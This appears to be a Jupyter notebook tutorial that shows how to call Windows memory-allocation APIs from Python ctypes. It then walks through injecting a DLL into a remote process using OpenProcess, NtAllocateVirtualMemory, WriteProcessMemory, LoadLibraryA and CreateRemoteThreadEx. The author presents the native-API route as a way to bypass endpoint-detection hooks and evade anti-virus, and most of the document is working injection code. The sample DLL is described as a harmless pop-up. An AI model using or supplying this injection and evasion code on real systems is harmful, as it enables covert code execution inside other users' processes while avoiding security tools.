# Virtual Memory Allocation function verus Native Virtual Memory Allocation function using python
The [virtualalloc](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc) which wraps around [NTAllocateVirtualMemory](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory) windows native api primitive function to run the operation in user mode. You can call the NTAllocateVirtualMemory function using ctypes in python to bypass user api hooking endpoint detection rules

In [ ]:
from ctypes import *
from ctypes import wintypes
kernel32 = windll.kernel32
SIZE_T = c_size_t

## API user mode Virtual Allocation of Memory Function
In C, we need to define the function with the data types of the parameters.

In [ ]:
#define the function
VA = kernel32.VirtualAlloc
VA.argtypes = (wintypes.LPVOID, SIZE_T, wintypes.DWORD, wintypes.DWORD)

VA.restype = wintypes.LPVOID

Next we set the parameters. According to the documentation, the memory allocation type allocates memory charges, physical pages are not allocated until virtual addresses are actually accessed. The memory reserves parameter reserves a range virtual address space without allocating any actual physical storage in memory or on disk. The page protections protect the region of pages allocated with the permission allowed.

In [ ]:
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x40

Here we call the function with all parameters set.

In [ ]:
pointer_to_alloced_mem = VA(None, 1024 * 4, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)

We should set a function for error handling with the [GetLastError](https://learn.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-getlasterror) function and the corresponding error message

In [ ]:
er = GetLastError()
if er:
    print(er) #pritning the error code
    print(WinError(er)) #pritning corresponding error message

Printing output:

In [ ]:
print("Virtual Allocation:", hex(pointer_to_alloced_mem))

## NtAllocateVirtualMemory native API call
This is a lower-level system that the function above wraps around. This function calls directly to the kernel which may not be detected by endpoint protection. We must define the function with the argument data types and the NTSTATUS as the return type of the function. Although this function is technically [documented](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory).

In [ ]:
nt = windll.ntdll
NTSTATUS = wintypes.DWORD
ntallvirmem = nt.NtAllocateVirtualMemory
ntallvirmem.argtypes = (wintypes.HANDLE, POINTER(wintypes.LPVOID), wintypes.ULONG, POINTER(wintypes.ULONG), wintypes.ULONG, wintypes.ULONG)
ntallvirmem.restype = NTSTATUS

### Making the parameters
The first thing we must do is get the handle for the current process, which can be filled by the special constants (like the maximum value for an unsigned constant 0xffffffffffffffff) used to refer to the current process, only valid within the calling process. The base address is set to null, which means the operating system will determine this. We will also set the zerobits as 0. The size will be large so that it is noticeable.

We will be using the same allocation type as virtual alloc above and same page protection.

In [ ]:
HANDLE = 0xffffffffffffffff
BASEADDRESSPRT = wintypes.LPVOID(0x0)

zerobits = wintypes.ULONG(0)
regionsizeptr = wintypes.ULONG(1024 * 12)

Now we call the function by passing the parameters we defined above.

In [ ]:
undocptr = ntallvirmem(HANDLE, byref(BASEADDRESSPRT), zerobits, byref(regionsizeptr), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)

Here we have a short if statement for Error handling by seeing if the status was 0, which indicates unsuccessful execution.

In [ ]:
if undocptr != 0:
    print("error:")
    print(undocptr)

Finally, we print the output of the base address of the virtual space we allocated.

In [ ]:
print("NT Virtual Allocation:", hex(BASEADDRESSPRT.value))

# Injecting DLL into a remote process

### Summary
A remote process is a process outside of the one currently running. In this section, we will use the memory of another process to run our "malicious" URL (it's just a bunny pop up). What distinguishes this code is that it uses the [NTAllocateVirtualMemory function](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory), which runs directly at the kernel level, which can evade basic anti-virus software. Additionally, this script uses all windows API functions, further evading any triggers of known malicious software.

### Steps
First we must define the PID of the remote process and the path of the DLL we would like to inject. I compiled the C++ project in Visual Studio Code community edition. 

The first function we define and call is [OpenProcess](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess). We will open the remote process, such as the one for calculator or notepad, and getting its handle. The Handle of a process is a process identifier that lets it access the resources, such as memory of other processes, which will be necessary for the rest of steps. We also give the process all access permissions using the flags defined in the documentation.

In [ ]:
pid = <insert_PID_as_int>
dll = b"C:\\Path\\to\\DLL\\here.dll"

OP = kernel32.OpenProcess
OP.argtypes =(wintypes.DWORD, wintypes.BOOL, wintypes.DWORD)
OP.restype = wintypes.HANDLE
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0x00000FFF)
handle = OP(PROCESS_ALL_ACCESS, False, pid)
if not handle:
    raise WinError()
else:
    print(f"Handle: {handle:#x}")

In this step we pass the handle into the NTAllocateVirtualMemory, which is the native API version that we reviewed above. We must allow read/write permission for the function on the pages, allocate a region size large enough for the DLL path and set a writeable base address to receive the base address of the space allocated in the remote process, which was targeted using the handle as an argument. 

In [ ]:
nt = windll.ntdll
NTSTATUS = wintypes.DWORD
ntavm = nt.NtAllocateVirtualMemory
ntavm.argtypes = (wintypes.HANDLE, POINTER(c_void_p), wintypes.ULONG, POINTER(c_size_t), wintypes.ULONG, wintypes.ULONG)
ntavm.restype = NTSTATUS
#constants
#Using same mem commit and mem reserve value, but different page protections
PAGE_READWRITE = 0x04
regionsizeptr = c_size_t(len(dll)+1)
BASEADDRESSPRT = c_void_p(0)
undocptr = ntavm(handle, byref(BASEADDRESSPRT), 0, byref(regionsizeptr), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)
remoteaddress = BASEADDRESSPRT.value
if undocptr != 0:
    print("error:")
    print(undocptr)
else:
    print(f"Remote address: {remoteaddress:#x}")

Next we use the handle and the base address we set previously to then begin writing to the memory space with the DLL path using the [WriteProcessMemory](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory) function with the set DLL, baseaddress and process handle for arguments.

In [ ]:
WPM = kernel32.WriteProcessMemory
WPM.argtypes = (wintypes.HANDLE, wintypes.LPVOID, wintypes.LPCVOID, SIZE_T, POINTER(SIZE_T))
WPM.restype = wintypes.BOOL
written = c_size_t(0) 
writing = WPM(handle, remoteaddress, dll, len(dll)+1, byref(written))
if writing == 0:
    raise WinError()
else:
    print(f"Bytes written: {written.value}")

Here, we must load the process address of the library we will use to load the DLL module into the address space that we allocated in the remote process. We will use the [getprocaddress](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress) function to retrive the address of LoadLibraryA.

In [ ]:
GPA = kernel32.GetProcAddress
GPA.argtypes = (wintypes.HANDLE, LPCTSTR)
GPA.restype = wintypes.LPVOID
loadlib = GPA(kernel32._handle, b"LoadLibraryA")
if not loadlib:
    print("ERROR")
else:
    print(f"Load lib address: {loadlib:#x}")

Now, we can create the thread in the remote process to run our DLL module using the [CreateRemoteThreadEx](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethreadex) function. First we define the function and parameters, as in the other functions above. CreateRemoteThreadEx does require a c-structure as an argument so the thread can have security permission. In this case, we assign the default security descriptors by passing a null value, nevertheless we must define the structure as a class first, then assign the pointer value of that structure to pass as an argument. 

Finally, we create the thread using the process handle to identify the process, the LoadLibraryA to facilitate the module execution and the remote address to identify where the DLL is that needs to be executed.

In [ ]:

class _Security_Attributes(Structure):
    _fields_ = [('nlength', wintypes.DWORD), 
                ('lpSecurityDescriptor', wintypes.LPVOID), 
                ('bInheritHandle', wintypes.BOOL)]
Security_Attributes = _Security_Attributes
LPSecurity_Attributes = POINTER(_Security_Attributes)
LPTHREAT_START_ROUTINE = wintypes.LPVOID
CRT = kernel32.CreateRemoteThreadEx
CRT.argtypes = (wintypes.HANDLE, LPSecurity_Attributes, SIZE_T, LPTHREAT_START_ROUTINE, wintypes.LPVOID, wintypes.DWORD, wintypes.LPDWORD)
#CRT.argtypes = (wintypes.HANDLE, SIZE_T, LPTHREAT_START_ROUTINE, wintypes.LPVOID, wintypes.DWORD, wintypes.LPDWORD)
CRT.restype = wintypes.HANDLE
EXECUTE_IMMED = 0

createthread = CRT(handle, None, 0, loadlib, remoteaddress, 0, None)